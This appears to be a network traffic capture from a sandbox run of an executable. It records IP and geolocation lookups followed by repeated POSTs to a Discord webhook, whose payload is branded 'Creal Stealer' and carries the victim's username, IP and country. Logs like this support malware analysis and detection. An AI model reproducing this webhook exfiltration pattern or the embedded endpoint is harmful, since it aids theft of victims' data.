Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:45 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:18:46 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:18:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:18:46 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:46 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:46 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:46 UTC	1351	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:46 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2c2548ac7cec11ef96902e88ff694586; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453928 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xovJQK%2BUb%2BSRoiWGWkZ%2FgK%2FXYFN8quOhjeQVzrVNZhFTlqUu%2BRoTMkJ8aKXQCTOZR2Fiyxi3zI%2FAWqzoIfMqas%2BNd%2F9z5lWD4Fw3f%2B2rX3NvfiQZgq%2F%2Fw4YCseFD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2c2548ac7cec11ef96902e88ff6945860574171a8514fb3dbed8872d2b00dc2dccec3c3323101a3641fb73b584d3e0dd; Expires=Wed, 26-Sep-2029 16:18:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=d88352afcbe6c0495ada4acc41fdf5b344043843-1727453926; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:46 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 55 62 6f 79 49 38 76 4f 74 6f 4f 6d 51 73 6d 4b 37 6b 64 39 2e 6a 50 4f 67 6b 31 59 79 63 53 49 57 75 62 65 38 39 61 53 51 5a 49 2d 31 37 32 37 34 35 33 39 32 36 36 36 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 31 34 62 32 33 34 34 30 64 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=UboyI8vOtoOmQsmK7kd9.jPOgk1YycSIWube89aSQZI-1727453926666-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfc14b23440d-EWR
2024-09-27 16:18:46 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:47 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:47 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:47 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:47 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2c884cae7cec11efb7d996c5ef0f4df4; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453928 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSKOyIVVhqjejoFtO0Y62dBcZKdHqGnV96QBVRkYjfz%2BB3FJ2X5fqSJLqRJeM3Nfz61owU5d0917%2FmmRa2OGz1UVQolOJivICCKm4nVjLZljCq17CcJ1XRHlPsYr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2c884cae7cec11efb7d996c5ef0f4df4af77d857d1ca82c06705918a393e1383f4d5bb766d3204b3dbd951095cc23a8e; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:47 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 54 2e 4e 31 70 52 57 62 42 30 4b 57 6f 54 4d 4a 6e 43 44 6f 4c 7a 64 4a 49 44 75 6a 47 6e 56 43 59 42 79 75 77 5a 74 39 37 53 51 2d 31 37 32 37 34 35 33 39 32 37 33 31 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 35 35 61 31 31 34 33 38 62 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=T.N1pRWbB0KWoTMJnCDoLzdJIDujGnVCYByuwZt97SQ-1727453927314-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfc55a11438b-EWR
2024-09-27 16:18:47 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49711	172.67.74.152	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:47 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:18:47 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:18:47 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9ccfc718b10c8e-EWR
2024-09-27 16:18:47 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49712	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:47 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:47 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:48 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:47 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2ceda5867cec11efb49f26388b8e290c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453929 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9VLiIZL9CiQDwsZsVVM8xkihe3RdWMatsLZYBBAjlz8rE9BHI2e5hEMvigE6G%2FL8Jc4DZ8agV%2F3NwXezHs%2BzHNaIa5duVfIB5aZqf4xvbW1NQ5TWu7ICnloS2teB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2ceda5867cec11efb49f26388b8e290c1c04bc1da02c529961f307b8cc5d202341e437e6ba8755640047164057bc7b5c; Expires=Wed, 26-Sep-2029 16:18:47 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=30984a00c213f058f0b9c6261788305c89a5cec9-1727453927; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:48 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 59 32 64 53 5a 6c 38 49 30 6b 30 61 48 32 4d 6e 62 39 36 38 36 33 6d 66 63 65 66 72 2e 31 50 70 72 64 38 48 7a 6b 53 52 70 48 38 2d 31 37 32 37 34 35 33 39 32 37 39 38 32 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 39 38 66 62 31 34 31 62 64 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=Y2dSZl8I0k0aH2Mnb96863mfcefr.1Pprd8HzkSRpH8-1727453927982-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfc98fb141bd-EWR
2024-09-27 16:18:48 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49713	159.89.102.253	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:48 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:18:48 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:18:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:18:48 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49714	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:48 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:48 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:48 UTC	1353	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:48 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2d51653a7cec11efbc503afbab16203a; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453930 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sY%2Bjsb%2FW%2FfUaqsU7MA8A8TOSiqI00aN8mmv3uUl7Z4NFiAC1%2BNK1wnK%2F%2FPd%2FdhXw7SSi%2Fk1DrihQ%2FHh2pz6sd8bvu%2BrxZ7VE71oXmt4QCpyq10SZ%2FRvjqyPc%2FwGj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2d51653a7cec11efbc503afbab16203aa9b8cbaa67aebaf0008bcea960b22ff7f92bd80335a265625fda557de3aa0079; Expires=Wed, 26-Sep-2029 16:18:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=74796d8ae5164ae6da566c41aec5bf5b1d4c8013-1727453928; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:18:48 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 7a 4d 39 6a 36 58 4b 6b 55 78 44 55 41 58 48 69 72 67 64 76 65 6e 79 49 78 6f 77 64 73 35 51 70 4c 74 50 48 35 53 70 76 57 67 2d 31 37 32 37 34 35 33 39 32 38 36 33 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 63 66 63 64 61 38 34 62 34 33 61 30 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=QzM9j6XKkUxDUAXHirgdvenyIxowds5QpLtPH5SpvWg-1727453928633-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9ccfcda84b43a0-EWR
2024-09-27 16:18:48 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49715	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:18:49 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:18:49 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:18:49 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:18:49 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=2db5f4c87cec11ef9f2fea3c9a69472c; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453930 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvXOxl5GduNF6QQBTn4VjDMmJuCct0yF7KCzgh1xZaHmMAlA9tURtileaYSYRVwsX0qVP875FsETEy%2Bc%2BbeBN6PJp4rorgwLZWLTT8EF7PNHYQs6DD7MeSu2NZZR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=2db5f4c87cec11ef9f2fea3c9a69472c647c95a3107240db7e30f3e52fd1ce39c773bfe25bc2e7394de89af0e12b41ca; Expires=Wed, 26-Sep-2029 16:18:49 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=27daf6c2fc89799e3442095c271b0cbbbb308515-1727453929; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
